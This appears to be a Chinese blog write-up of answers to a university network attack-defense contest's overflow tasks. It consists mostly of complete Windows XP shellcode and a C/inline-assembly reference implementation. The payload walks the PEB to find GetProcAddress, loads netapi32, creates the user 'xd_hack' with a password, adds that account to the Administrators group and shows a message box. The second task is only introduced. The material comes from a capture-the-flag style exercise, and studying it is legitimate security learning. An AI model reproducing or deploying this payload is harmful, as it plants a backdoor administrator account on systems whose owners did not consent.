西电网络攻防第三届溢出题答案分析 by 半斤八兩
/**************************************
/* 作者:半斤八兩
/* 博客:http://hi.baidu.com/bjblcracked
/* 日期:2012-10-15 13:30
/**************************************
只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
第一题
请按照要求编写一段shellcode。
2、 要求:
(1)添加具有管理员权限用户(用户名:xd_hack, 密码:success);
(2)出现对话框,如图:
(3)添加成功后,能够退出线程,不致因溢出导致异常;
(4)运行平台:win32 XP sp3 中文;
3、 请按照正确答案格式提交,格式如下:
代码:
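#include <stdio.h>
#include <string.h>   /* strlen(): the original listing used it without the header */

/*
 * Answer-format template from the task statement: a raw x86 payload that is
 * executed in-process by casting the byte array to a function pointer.
 *
 * What the bytes do (decoded from the hand-written x86 below):
 *   - xor eax/ebx/ecx/edx to zero, push "user32.dll  " onto the stack and call
 *     LoadLibraryA on it (absolute address 0x7c801d7b).
 *   - build "MessageBoxA" on the stack; the last dword is produced by
 *     mov ecx,0xef30675e / add ecx,0x11111111 = 0x0041786f ("oxA\0") so the
 *     payload itself carries no 0x00 byte; resolve it with GetProcAddress
 *     (0x7c80ae40).
 *   - MessageBoxA(0, p, p, 0) where p points at the stack string, then
 *     ExitProcess(0) via 0x7c81cb12.
 *
 * Caveats a reader should keep in mind:
 *   - The three addresses are kernel32.dll exports of one specific build
 *     (the task's Windows XP SP3 Chinese, which has no ASLR). On any other
 *     build they point elsewhere and the payload crashes.
 *   - strlen() stops at the first 0x00, so the printed length is only the true
 *     length while the payload stays NUL-free (it currently is: 87 bytes).
 *   - Executing a .data array needs an executable page; with DEP enforced for
 *     this process (it is opt-in for user programs on XP SP3) the call faults.
 */
char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
    "\x51\x68\x6c\x6c\x20\x20\x68\x33"
    "\x32\x2e\x64\x68\x75\x73\x65\x72"
    "\x89\xe1\xbb\x7b\x1d\x80\x7c\x51"   /* 0x7c801d7b ; LoadLibraryA("user32.dll  ")            */
    "\xff\xd3\xb9\x5e\x67\x30\xef\x81"
    "\xc1\x11\x11\x11\x11\x51\x68\x61"
    "\x67\x65\x42\x68\x4d\x65\x73\x73"
    "\x89\xe1\x51\x50\xbb\x40\xae\x80"   /* 0x7c80ae40 ; GetProcAddress(hUser32, "MessageBoxA") */
    "\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
    "\x51\x51\x52\xff\xd0\x31\xc0\x50"
    "\xb8\x12\xcb\x81\x7c\xff\xd0";      /* 0x7c81cb12 ; ExitProcess(0)                          */

int main(int argc, char **argv)
{
    /* Treat the array as a function taking and returning nothing. */
    void (*func)(void) = (void (*)(void))shellcode;

    (void)argc;
    (void)argv;
    /* size_t is not an int; cast for the portable conversion. */
    printf("Shellcode Length is : %u", (unsigned)strlen(shellcode));
    /* The payload ends in ExitProcess, which skips the CRT's exit flush. */
    fflush(stdout);
    func();
    return 0;   /* not reached while the payload calls ExitProcess */
}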
4. 计分规则(略)
因为我之前没有玩过溢出,所以代码写的有点长..
我是先用C实现,然后用OD加载,把里面的二进制数据提取出来.
这一题,本来是想用 Kernel32!WinExec 来实现的.因群里面一朋友说了 Netapi32.dll
的导出函数也能实现,但是不会使用.正好我也没有用过,所以就用这种方法实现.
相比之下,这种代码有点繁琐. 另外要注意:NetUserAdd / NetLocalGroupAddMembers 只有在调用进程本身已经具备管理员权限时才会成功(否则返回 ERROR_ACCESS_DENIED),下面的 shellcode 并没有检查返回值;这一点和用 WinExec 执行 "net user ... /add" 是一样的,并不是这种方法特有的限制.
第1题代码:
代码:
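#include "stdafx.h"
#include <windows.h>
#include <lm.h>

/* Prototype-shaped globals for the two netapi32 exports the payload calls.
 * They are never assigned or invoked; the inline-asm version keeps the
 * resolved addresses in plain DWORD locals. Kept as documentation of the
 * argument order the asm pushes. */
DWORD (WINAPI *IsNetLocalGroupAddMembers)(LPCWSTR servername, LPCWSTR groupname,
                                          DWORD level, LPBYTE buf, DWORD totalentries);
DWORD (WINAPI *IsNetUserAdd)(LPCWSTR servername, DWORD level, LPBYTE buf, LPDWORD parm_err);

/*
 * Task 1 payload, lifted with OllyDbg from the compiled ReferenceImplementation()
 * below and regrouped here one instruction per line (same bytes, same order).
 *
 * What the bytes rely on:
 *   - Every scratch variable is addressed relative to EBP, from [ebp-0x50]
 *     down to [ebp-0x118]; the caller must supply a frame with at least that
 *     much free stack below EBP (main() gives it 0x308 bytes). Inside a real
 *     overflow EBP is usually attacker-controlled or garbage, so the payload
 *     would need a prologue of its own there.
 *   - Three absolute addresses are hard-coded for the author's Windows XP SP3
 *     (Chinese, no ASLR): kernel32!LoadLibraryA 0x7c801d7b, user32!MessageBoxA
 *     0x77d507ea and, commented out, kernel32!ExitProcess 0x7c81cb12. Only
 *     GetProcAddress is located dynamically, by the 80-byte stub that is
 *     first copied to [ebp-0x50]: fs:[0x30] -> PEB -> Ldr ->
 *     InInitializationOrderModuleList, second entry (kernel32 on XP), then a
 *     scan of that module's export name table for "GetProcA".
 *   - The payload ends with RET (the ExitProcess tail is commented out), so
 *     stand-alone it returns into whatever is on the stack. Task requirement
 *     (3) asks for a clean exit; re-enable the tail for that use.
 *   - NOTE(review): the password written to [ebp-0x70] is L"Success"
 *     (0x53 = 'S'); the task statement asks for "success". Change 0x53 to
 *     0x73 here and in szPass below if the grader compares case.
 *   - NetUserAdd / NetLocalGroupAddMembers succeed only when the calling
 *     process already holds administrator rights; no return value is checked.
 */
BYTE szCmdShell[] = {
    /* --- 1. write the 80-byte GetProcAddress finder to [ebp-0x50 .. ebp-1] ---
       each group is "mov byte ptr [ebp+disp8], imm8" (C6 45 disp imm); the
       values are the bytes of szGetProcAddress in ReferenceImplementation() */
    0xc6, 0x45, 0xb0, 0x64,  0xc6, 0x45, 0xb1, 0xa1,  0xc6, 0x45, 0xb2, 0x30,  0xc6, 0x45, 0xb3, 0x00,
    0xc6, 0x45, 0xb4, 0x00,  0xc6, 0x45, 0xb5, 0x00,  0xc6, 0x45, 0xb6, 0x8b,  0xc6, 0x45, 0xb7, 0x40,
    0xc6, 0x45, 0xb8, 0x0c,  0xc6, 0x45, 0xb9, 0x8b,  0xc6, 0x45, 0xba, 0x70,  0xc6, 0x45, 0xbb, 0x1c,
    0xc6, 0x45, 0xbc, 0xad,  0xc6, 0x45, 0xbd, 0x8b,  0xc6, 0x45, 0xbe, 0x40,  0xc6, 0x45, 0xbf, 0x08,
    0xc6, 0x45, 0xc0, 0x8b,  0xc6, 0x45, 0xc1, 0xe8,  0xc6, 0x45, 0xc2, 0x8b,  0xc6, 0x45, 0xc3, 0x45,
    0xc6, 0x45, 0xc4, 0x3c,  0xc6, 0x45, 0xc5, 0x8b,  0xc6, 0x45, 0xc6, 0x54,  0xc6, 0x45, 0xc7, 0x28,
    0xc6, 0x45, 0xc8, 0x78,  0xc6, 0x45, 0xc9, 0x03,  0xc6, 0x45, 0xca, 0xd5,  0xc6, 0x45, 0xcb, 0x8b,
    0xc6, 0x45, 0xcc, 0x4a,  0xc6, 0x45, 0xcd, 0x18,  0xc6, 0x45, 0xce, 0x8b,  0xc6, 0x45, 0xcf, 0x5a,
    0xc6, 0x45, 0xd0, 0x20,  0xc6, 0x45, 0xd1, 0x03,  0xc6, 0x45, 0xd2, 0xdd,  0xc6, 0x45, 0xd3, 0x49,
    0xc6, 0x45, 0xd4, 0x8b,  0xc6, 0x45, 0xd5, 0x34,  0xc6, 0x45, 0xd6, 0x8b,  0xc6, 0x45, 0xd7, 0x03,
    0xc6, 0x45, 0xd8, 0xf5,  0xc6, 0x45, 0xd9, 0xb8,  0xc6, 0x45, 0xda, 0x47,  0xc6, 0x45, 0xdb, 0x65,
    0xc6, 0x45, 0xdc, 0x74,  0xc6, 0x45, 0xdd, 0x50,  0xc6, 0x45, 0xde, 0x39,  0xc6, 0x45, 0xdf, 0x06,
    0xc6, 0x45, 0xe0, 0x75,  0xc6, 0x45, 0xe1, 0xf1,  0xc6, 0x45, 0xe2, 0xb8,  0xc6, 0x45, 0xe3, 0x72,
    0xc6, 0x45, 0xe4, 0x6f,  0xc6, 0x45, 0xe5, 0x63,  0xc6, 0x45, 0xe6, 0x41,  0xc6, 0x45, 0xe7, 0x39,
    0xc6, 0x45, 0xe8, 0x46,  0xc6, 0x45, 0xe9, 0x04,  0xc6, 0x45, 0xea, 0x75,  0xc6, 0x45, 0xeb, 0xe7,
    0xc6, 0x45, 0xec, 0x8b,  0xc6, 0x45, 0xed, 0x5a,  0xc6, 0x45, 0xee, 0x24,  0xc6, 0x45, 0xef, 0x03,
    0xc6, 0x45, 0xf0, 0xdd,  0xc6, 0x45, 0xf1, 0x66,  0xc6, 0x45, 0xf2, 0x8b,  0xc6, 0x45, 0xf3, 0x0c,
    0xc6, 0x45, 0xf4, 0x4b,  0xc6, 0x45, 0xf5, 0x8b,  0xc6, 0x45, 0xf6, 0x5a,  0xc6, 0x45, 0xf7, 0x1c,
    0xc6, 0x45, 0xf8, 0x03,  0xc6, 0x45, 0xf9, 0xdd,  0xc6, 0x45, 0xfa, 0x8b,  0xc6, 0x45, 0xfb, 0x04,
    0xc6, 0x45, 0xfc, 0x8b,  0xc6, 0x45, 0xfd, 0x03,  0xc6, 0x45, 0xfe, 0xc5,  0xc6, 0x45, 0xff, 0xc3,

    /* --- 2. string data, built in place so the payload carries no pointers ---
       L"xd_hack" at [ebp-0x60]: mov word ptr [ebp+disp8], imm16 (66 C7 45 disp lo hi) */
    0x66, 0xc7, 0x45, 0xa0, 0x78, 0x00,  0x66, 0xc7, 0x45, 0xa2, 0x64, 0x00,
    0x66, 0xc7, 0x45, 0xa4, 0x5f, 0x00,  0x66, 0xc7, 0x45, 0xa6, 0x68, 0x00,
    0x66, 0xc7, 0x45, 0xa8, 0x61, 0x00,  0x66, 0xc7, 0x45, 0xaa, 0x63, 0x00,
    0x66, 0xc7, 0x45, 0xac, 0x6b, 0x00,  0x66, 0xc7, 0x45, 0xae, 0x00, 0x00,
    /* L"Success" at [ebp-0x70]  (NOTE(review): the task asks for "success") */
    0x66, 0xc7, 0x45, 0x90, 0x53, 0x00,  0x66, 0xc7, 0x45, 0x92, 0x75, 0x00,
    0x66, 0xc7, 0x45, 0x94, 0x63, 0x00,  0x66, 0xc7, 0x45, 0x96, 0x63, 0x00,
    0x66, 0xc7, 0x45, 0x98, 0x65, 0x00,  0x66, 0xc7, 0x45, 0x9a, 0x73, 0x00,
    0x66, 0xc7, 0x45, 0x9c, 0x73, 0x00,  0x66, 0xc7, 0x45, 0x9e, 0x00, 0x00,
    /* "Overflow" at [ebp-0x7c] (mov byte ptr [ebp+disp8], imm8) */
    0xc6, 0x45, 0x84, 0x4f,  0xc6, 0x45, 0x85, 0x76,  0xc6, 0x45, 0x86, 0x65,  0xc6, 0x45, 0x87, 0x72,
    0xc6, 0x45, 0x88, 0x66,  0xc6, 0x45, 0x89, 0x6c,  0xc6, 0x45, 0x8a, 0x6f,  0xc6, 0x45, 0x8b, 0x77,
    0xc6, 0x45, 0x8c, 0x00,
    /* "Expoit sucess" (sic, matches szContent) at [ebp-0x8c]; the compiler used
       the disp32 form (C6 85 disp32 imm8) while the offset is below -0x80 */
    0xc6, 0x85, 0x74, 0xff, 0xff, 0xff, 0x45,  0xc6, 0x85, 0x75, 0xff, 0xff, 0xff, 0x78,
    0xc6, 0x85, 0x76, 0xff, 0xff, 0xff, 0x70,  0xc6, 0x85, 0x77, 0xff, 0xff, 0xff, 0x6f,
    0xc6, 0x85, 0x78, 0xff, 0xff, 0xff, 0x69,  0xc6, 0x85, 0x79, 0xff, 0xff, 0xff, 0x74,
    0xc6, 0x85, 0x7a, 0xff, 0xff, 0xff, 0x20,  0xc6, 0x85, 0x7b, 0xff, 0xff, 0xff, 0x73,
    0xc6, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x75,  0xc6, 0x85, 0x7d, 0xff, 0xff, 0xff, 0x63,
    0xc6, 0x85, 0x7e, 0xff, 0xff, 0xff, 0x65,  0xc6, 0x85, 0x7f, 0xff, 0xff, 0xff, 0x73,
    0xc6, 0x45, 0x80, 0x73,  0xc6, 0x45, 0x81, 0x00,
    /* "netapi32.dll" at [ebp-0x9c] */
    0xc6, 0x85, 0x64, 0xff, 0xff, 0xff, 0x6e,  0xc6, 0x85, 0x65, 0xff, 0xff, 0xff, 0x65,
    0xc6, 0x85, 0x66, 0xff, 0xff, 0xff, 0x74,  0xc6, 0x85, 0x67, 0xff, 0xff, 0xff, 0x61,
    0xc6, 0x85, 0x68, 0xff, 0xff, 0xff, 0x70,  0xc6, 0x85, 0x69, 0xff, 0xff, 0xff, 0x69,
    0xc6, 0x85, 0x6a, 0xff, 0xff, 0xff, 0x33,  0xc6, 0x85, 0x6b, 0xff, 0xff, 0xff, 0x32,
    0xc6, 0x85, 0x6c, 0xff, 0xff, 0xff, 0x2e,  0xc6, 0x85, 0x6d, 0xff, 0xff, 0xff, 0x64,
    0xc6, 0x85, 0x6e, 0xff, 0xff, 0xff, 0x6c,  0xc6, 0x85, 0x6f, 0xff, 0xff, 0xff, 0x6c,
    0xc6, 0x85, 0x70, 0xff, 0xff, 0xff, 0x00,
    /* L"Administrators" at [ebp-0xbc] (66 C7 85 disp32 imm16) */
    0x66, 0xc7, 0x85, 0x44, 0xff, 0xff, 0xff, 0x41, 0x00,  0x66, 0xc7, 0x85, 0x46, 0xff, 0xff, 0xff, 0x64, 0x00,
    0x66, 0xc7, 0x85, 0x48, 0xff, 0xff, 0xff, 0x6d, 0x00,  0x66, 0xc7, 0x85, 0x4a, 0xff, 0xff, 0xff, 0x69, 0x00,
    0x66, 0xc7, 0x85, 0x4c, 0xff, 0xff, 0xff, 0x6e, 0x00,  0x66, 0xc7, 0x85, 0x4e, 0xff, 0xff, 0xff, 0x69, 0x00,
    0x66, 0xc7, 0x85, 0x50, 0xff, 0xff, 0xff, 0x73, 0x00,  0x66, 0xc7, 0x85, 0x52, 0xff, 0xff, 0xff, 0x74, 0x00,
    0x66, 0xc7, 0x85, 0x54, 0xff, 0xff, 0xff, 0x72, 0x00,  0x66, 0xc7, 0x85, 0x56, 0xff, 0xff, 0xff, 0x61, 0x00,
    0x66, 0xc7, 0x85, 0x58, 0xff, 0xff, 0xff, 0x74, 0x00,  0x66, 0xc7, 0x85, 0x5a, 0xff, 0xff, 0xff, 0x6f, 0x00,
    0x66, 0xc7, 0x85, 0x5c, 0xff, 0xff, 0xff, 0x72, 0x00,  0x66, 0xc7, 0x85, 0x5e, 0xff, 0xff, 0xff, 0x73, 0x00,
    0x66, 0xc7, 0x85, 0x60, 0xff, 0xff, 0xff, 0x00, 0x00,
    /* "NetUserAdd" at [ebp-0xc8] */
    0xc6, 0x85, 0x38, 0xff, 0xff, 0xff, 0x4e,  0xc6, 0x85, 0x39, 0xff, 0xff, 0xff, 0x65,
    0xc6, 0x85, 0x3a, 0xff, 0xff, 0xff, 0x74,  0xc6, 0x85, 0x3b, 0xff, 0xff, 0xff, 0x55,
    0xc6, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x73,  0xc6, 0x85, 0x3d, 0xff, 0xff, 0xff, 0x65,
    0xc6, 0x85, 0x3e, 0xff, 0xff, 0xff, 0x72,  0xc6, 0x85, 0x3f, 0xff, 0xff, 0xff, 0x41,
    0xc6, 0x85, 0x40, 0xff, 0xff, 0xff, 0x64,  0xc6, 0x85, 0x41, 0xff, 0xff, 0xff, 0x64,
    0xc6, 0x85, 0x42, 0xff, 0xff, 0xff, 0x00,
    /* "NetLocalGroupAddMembers" at [ebp-0xe0] */
    0xc6, 0x85, 0x20, 0xff, 0xff, 0xff, 0x4e,  0xc6, 0x85, 0x21, 0xff, 0xff, 0xff, 0x65,
    0xc6, 0x85, 0x22, 0xff, 0xff, 0xff, 0x74,  0xc6, 0x85, 0x23, 0xff, 0xff, 0xff, 0x4c,
    0xc6, 0x85, 0x24, 0xff, 0xff, 0xff, 0x6f,  0xc6, 0x85, 0x25, 0xff, 0xff, 0xff, 0x63,
    0xc6, 0x85, 0x26, 0xff, 0xff, 0xff, 0x61,  0xc6, 0x85, 0x27, 0xff, 0xff, 0xff, 0x6c,
    0xc6, 0x85, 0x28, 0xff, 0xff, 0xff, 0x47,  0xc6, 0x85, 0x29, 0xff, 0xff, 0xff, 0x72,
    0xc6, 0x85, 0x2a, 0xff, 0xff, 0xff, 0x6f,  0xc6, 0x85, 0x2b, 0xff, 0xff, 0xff, 0x75,
    0xc6, 0x85, 0x2c, 0xff, 0xff, 0xff, 0x70,  0xc6, 0x85, 0x2d, 0xff, 0xff, 0xff, 0x41,
    0xc6, 0x85, 0x2e, 0xff, 0xff, 0xff, 0x64,  0xc6, 0x85, 0x2f, 0xff, 0xff, 0xff, 0x64,
    0xc6, 0x85, 0x30, 0xff, 0xff, 0xff, 0x4d,  0xc6, 0x85, 0x31, 0xff, 0xff, 0xff, 0x65,
    0xc6, 0x85, 0x32, 0xff, 0xff, 0xff, 0x6d,  0xc6, 0x85, 0x33, 0xff, 0xff, 0xff, 0x62,
    0xc6, 0x85, 0x34, 0xff, 0xff, 0xff, 0x65,  0xc6, 0x85, 0x35, 0xff, 0xff, 0xff, 0x72,
    0xc6, 0x85, 0x36, 0xff, 0xff, 0xff, 0x73,  0xc6, 0x85, 0x37, 0xff, 0xff, 0xff, 0x00,

    /* --- 3. resolve the imports --- */
    0xc7, 0x85, 0x1c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* [ebp-0xe4] = 0   (NetUserAdd)                 */
    0xc7, 0x85, 0x18, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* [ebp-0xe8] = 0   (NetLocalGroupAddMembers)    */
    0xc7, 0x85, 0x14, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* [ebp-0xec] = 0   (GetProcAddress)             */
    0x55,                                                         /* push ebp          (the finder clobbers EBP)   */
    0x8d, 0x85, 0xb0, 0xff, 0xff, 0xff,                           /* lea eax, [ebp-0x50]                           */
    0xff, 0xd0,                                                   /* call eax          -> eax = GetProcAddress     */
    0x5d,                                                         /* pop ebp                                       */
    0x89, 0x85, 0x14, 0xff, 0xff, 0xff,                           /* [ebp-0xec] = eax                              */
    0xc7, 0x85, 0x10, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* [ebp-0xf0] = 0   (hNetapi32)                  */
    0x8d, 0x85, 0x64, 0xff, 0xff, 0xff,                           /* lea eax, [ebp-0x9c]   "netapi32.dll"          */
    0x50,                                                         /* push eax                                      */
    0xb8, 0x7b, 0x1d, 0x80, 0x7c,                                 /* mov eax, 0x7c801d7b   kernel32!LoadLibraryA   */
    0xff, 0xd0,                                                   /* call eax                                      */
    0x89, 0x85, 0x10, 0xff, 0xff, 0xff,                           /* [ebp-0xf0] = hNetapi32                        */
    0x8d, 0x85, 0x38, 0xff, 0xff, 0xff,                           /* lea eax, [ebp-0xc8]   "NetUserAdd"            */
    0x50,                                                         /* push eax                                      */
    0x8b, 0x85, 0x10, 0xff, 0xff, 0xff,                           /* mov eax, [ebp-0xf0]                           */
    0x50,                                                         /* push eax              hNetapi32               */
    0x8b, 0x85, 0x14, 0xff, 0xff, 0xff,                           /* mov eax, [ebp-0xec]                           */
    0xff, 0xd0,                                                   /* call eax   GetProcAddress(h, "NetUserAdd")    */
    0x89, 0x85, 0x1c, 0xff, 0xff, 0xff,                           /* [ebp-0xe4] = NetUserAdd                       */
    0x8d, 0x85, 0x20, 0xff, 0xff, 0xff,                           /* lea eax, [ebp-0xe0]   "NetLocalGroupAddMembers" */
    0x50,                                                         /* push eax                                      */
    0x8b, 0x85, 0x10, 0xff, 0xff, 0xff,                           /* mov eax, [ebp-0xf0]                           */
    0x50,                                                         /* push eax              hNetapi32               */
    0x8b, 0x85, 0x14, 0xff, 0xff, 0xff,                           /* mov eax, [ebp-0xec]                           */
    0xff, 0xd0,                                                   /* call eax   GetProcAddress(h, "NetLocal...")   */
    0x89, 0x85, 0x18, 0xff, 0xff, 0xff,                           /* [ebp-0xe8] = NetLocalGroupAddMembers          */

    /* --- 4. USER_INFO_1 at [ebp-0x114], LOCALGROUP_MEMBERS_INFO_3 at [ebp-0x118] --- */
    0xc7, 0x85, 0x0c, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* [ebp-0xf4] = 0    parm_err                    */
    0xc7, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* usri1_name = 0                                */
    0xb9, 0x07, 0x00, 0x00, 0x00,                                 /* mov ecx, 7                                    */
    0x33, 0xc0,                                                   /* xor eax, eax                                  */
    0x8d, 0xbd, 0xf0, 0xfe, 0xff, 0xff,                           /* lea edi, [ebp-0x110]                          */
    0xf3, 0xab,                                                   /* rep stosd         zero the other 7 fields     */
    0x8d, 0x45, 0xa0,                                             /* lea eax, [ebp-0x60]   L"xd_hack"              */
    0x89, 0x85, 0xec, 0xfe, 0xff, 0xff,                           /* usri1_name = eax                              */
    0x8d, 0x4d, 0x90,                                             /* lea ecx, [ebp-0x70]   L"Success"              */
    0x89, 0x8d, 0xf0, 0xfe, 0xff, 0xff,                           /* usri1_password = ecx                          */
    0xc7, 0x85, 0xf8, 0xfe, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,   /* usri1_priv = USER_PRIV_USER (1)               */
    0xc7, 0x85, 0xe8, 0xfe, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,   /* lgrmi3_domainandname = 0                      */
    0x8d, 0x55, 0xa0,                                             /* lea edx, [ebp-0x60]                           */
    0x89, 0x95, 0xe8, 0xfe, 0xff, 0xff,                           /* lgrmi3_domainandname = L"xd_hack"             */

    /* --- 5. NetUserAdd(NULL, 1, &info, &parm_err) --- */
    0x8d, 0x85, 0x0c, 0xff, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0xf4];  push eax   &parm_err    */
    0x8d, 0x85, 0xec, 0xfe, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0x114]; push eax   &info        */
    0x6a, 0x01,                                                   /* push 1            level                       */
    0x6a, 0x00,                                                   /* push 0            servername                  */
    0x8b, 0x85, 0x1c, 0xff, 0xff, 0xff, 0xff, 0xd0,               /* mov eax, [ebp-0xe4]; call eax (result ignored)*/

    /* --- 6. NetLocalGroupAddMembers(NULL, L"Administrators", 3, &member, 1) --- */
    0x6a, 0x01,                                                   /* push 1            totalentries                */
    0x8d, 0x85, 0xe8, 0xfe, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0x118]; push eax   &member      */
    0x6a, 0x03,                                                   /* push 3            level                       */
    0x8d, 0x85, 0x44, 0xff, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0xbc];  push eax   L"Administrators" */
    0x6a, 0x00,                                                   /* push 0            servername                  */
    0x8b, 0x85, 0x18, 0xff, 0xff, 0xff, 0xff, 0xd0,               /* mov eax, [ebp-0xe8]; call eax (result ignored)*/

    /* --- 7. MessageBoxA(NULL, "Expoit sucess", "Overflow", MB_ICONINFORMATION) --- */
    0x6a, 0x40,                                                   /* push 0x40                                     */
    0x8d, 0x85, 0x84, 0xff, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0x7c];  push eax   "Overflow"   */
    0x8d, 0x85, 0x74, 0xff, 0xff, 0xff, 0x50,                     /* lea eax, [ebp-0x8c];  push eax   text         */
    0x6a, 0x00,                                                   /* push 0            hWnd                        */
    0xb8, 0xea, 0x07, 0xd5, 0x77,                                 /* mov eax, 0x77d507ea   user32!MessageBoxA      */
    0xff, 0xd0,                                                   /* call eax                                      */
    0xc3                                                          /* ret               back into the harness frame */
    /* optional clean exit (task requirement 3): push -1; mov eax, 0x7c81cb12; call eax == ExitProcess(-1)
       0x6a, 0xff, 0xb8, 0x12, 0xcb, 0x81, 0x7c, 0xff, 0xd0 */
};

/*
 * The prototype the payload bytes were extracted from (with OllyDbg). It is
 * not called; it exists so a reader can map every group of bytes in
 * szCmdShell back to a statement. The author's note: the first version was
 * pure C, but the extracted code then contained relocations, so the calls
 * were rewritten as inline asm with the string data kept in local arrays.
 * Hard-coded: kernel32!LoadLibraryA, user32!MessageBoxA, kernel32!ExitProcess.
 * Resolved at run time through the PEB walk in szGetProcAddress:
 * GetProcAddress, and via it NetUserAdd / NetLocalGroupAddMembers.
 */
static int ReferenceImplementation()
{
    /* GetProcAddress finder: fs:[0x30] (PEB) -> Ldr -> InInitializationOrderModuleList,
     * second entry (kernel32 on XP) -> export name table scan for "GetProcA".
     * Returns the address in eax and clobbers EBP (hence push/pop around the call). */
    BYTE szGetProcAddress[] = {
        0x64, 0xa1, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x40, 0x0c, 0x8b, 0x70, 0x1c, 0xad, 0x8b, 0x40, 0x08,
        0x8b, 0xe8, 0x8b, 0x45, 0x3c, 0x8b, 0x54, 0x28, 0x78, 0x03, 0xd5, 0x8b, 0x4a, 0x18, 0x8b, 0x5a,
        0x20, 0x03, 0xdd, 0x49, 0x8b, 0x34, 0x8b, 0x03, 0xf5, 0xb8, 0x47, 0x65, 0x74, 0x50, 0x39, 0x06,
        0x75, 0xf1, 0xb8, 0x72, 0x6f, 0x63, 0x41, 0x39, 0x46, 0x04, 0x75, 0xe7, 0x8b, 0x5a, 0x24, 0x03,
        0xdd, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x5a, 0x1c, 0x03, 0xdd, 0x8b, 0x04, 0x8b, 0x03, 0xc5, 0xc3
    };
    wchar_t szName[] = {0x78, 0x64, 0x5f, 0x68, 0x61, 0x63, 0x6b, 0x00};                 /* L"xd_hack"  */
    wchar_t szPass[] = {0x53, 0x75, 0x63, 0x63, 0x65, 0x73, 0x73, 0x00};                 /* L"Success" -- task says "success" */
    char szCaption[] = {0x4f, 0x76, 0x65, 0x72, 0x66, 0x6c, 0x6f, 0x77, 0x00};           /* "Overflow"  */
    char szContent[] = {0x45, 0x78, 0x70, 0x6f, 0x69, 0x74, 0x20, 0x73, 0x75, 0x63, 0x65, 0x73, 0x73, 0x00}; /* "Expoit sucess" (sic) */
    char szNetapi32[] = {0x6e, 0x65, 0x74, 0x61, 0x70, 0x69, 0x33, 0x32, 0x2e, 0x64, 0x6c, 0x6c, 0x00};     /* "netapi32.dll" */
    wchar_t szAdministroatr[] = {0x41, 0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x73, 0x00}; /* L"Administrators" */
    char szNetUserAdd[] = {0x4e, 0x65, 0x74, 0x55, 0x73, 0x65, 0x72, 0x41, 0x64, 0x64, 0x00};
    char szNetLocalGroupAddMembers[] = {
        0x4e, 0x65, 0x74, 0x4c, 0x6f, 0x63, 0x61, 0x6c, 0x47, 0x72, 0x6f, 0x75, 0x70,
        0x41, 0x64, 0x64, 0x4d, 0x65, 0x6d, 0x62, 0x65, 0x72, 0x73, 0x00
    };
    DWORD dwNetUserAdd = 0;
    DWORD dwNetLocalGroupAddMembers = 0;
    DWORD dwGetProcAddress = 0;

    _asm {
        push ebp                      // the finder overwrites ebp
        lea eax, szGetProcAddress
        call eax
        pop ebp
        mov dwGetProcAddress, eax
    }

    // HMODULE hNetAddress = (HMODULE)LoadLibraryA(szNetapi32);  -- hard-coded XP SP3 address
    HMODULE hNetAddress = NULL;
    _asm {
        lea eax, szNetapi32
        push eax
        mov eax, 0x7C801D7B
        call eax
        mov hNetAddress, eax
    }

    // dwNetUserAdd = GetProcAddress(hNetAddress, "NetUserAdd");
    _asm {
        lea eax, szNetUserAdd
        push eax
        mov eax, hNetAddress
        push eax
        mov eax, dwGetProcAddress
        call eax
        mov dwNetUserAdd, eax
    }

    // dwNetLocalGroupAddMembers = GetProcAddress(hNetAddress, "NetLocalGroupAddMembers");
    _asm {
        lea eax, szNetLocalGroupAddMembers
        push eax
        mov eax, hNetAddress
        push eax
        mov eax, dwGetProcAddress
        call eax
        mov dwNetLocalGroupAddMembers, eax
    }

    DWORD dwError = 0;
    USER_INFO_1 tagInfo = {0};
    tagInfo.usri1_name = szName;
    tagInfo.usri1_password = szPass;
    tagInfo.usri1_priv = USER_PRIV_USER;
    LOCALGROUP_MEMBERS_INFO_3 tagLocalgroup = {0};
    tagLocalgroup.lgrmi3_domainandname = szName;

    // NetUserAdd(NULL, 1, (PUCHAR)&tagInfo, &dwError);  -- return value not checked
    _asm {
        lea eax, dwError
        push eax
        lea eax, tagInfo
        push eax
        push 1
        push 0
        mov eax, dwNetUserAdd
        call eax
    }

    // NetLocalGroupAddMembers(NULL, szAdministroatr, 3, (PUCHAR)&tagLocalgroup, 1);
    _asm {
        push 1
        lea eax, tagLocalgroup
        push eax
        push 3
        lea eax, szAdministroatr
        push eax
        push 0
        mov eax, dwNetLocalGroupAddMembers
        call eax
    }

    // MessageBoxA(NULL, szContent, szCaption, MB_ICONINFORMATION);  -- hard-coded XP SP3 zh-CN address
    _asm {
        push 0x40
        lea eax, szCaption
        push eax
        lea eax, szContent
        push eax
        push 0
        mov eax, 0x77D507EA
        call eax
    }

    // ExitProcess(-1);  -- hard-coded XP SP3 address
    _asm {
        push -1
        mov eax, 0x7C81CB12
        call eax
    }
    return 0;
}

int main(int argc, wchar_t *argv[])
{
    /* Give the payload the EBP-relative frame it expects ([ebp-0x50] down to
     * [ebp-0x118]; 0x308 bytes is generous) and call it. The payload ends in
     * RET, after which the frame is torn down again. */
    _asm {
        push ebp
        mov ebp, esp
        sub esp, 0x308
        lea eax, szCmdShell
        call eax
        mov esp, ebp
        pop ebp
    }
    return 0;
}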
第二题:
第二题说明
请输入一段字符串;
目的是使程序显示如下对话框:
不得修改程序本身;
提交答案,给出字符串内容。
第二题,算是溢出4题里面最简单的了.
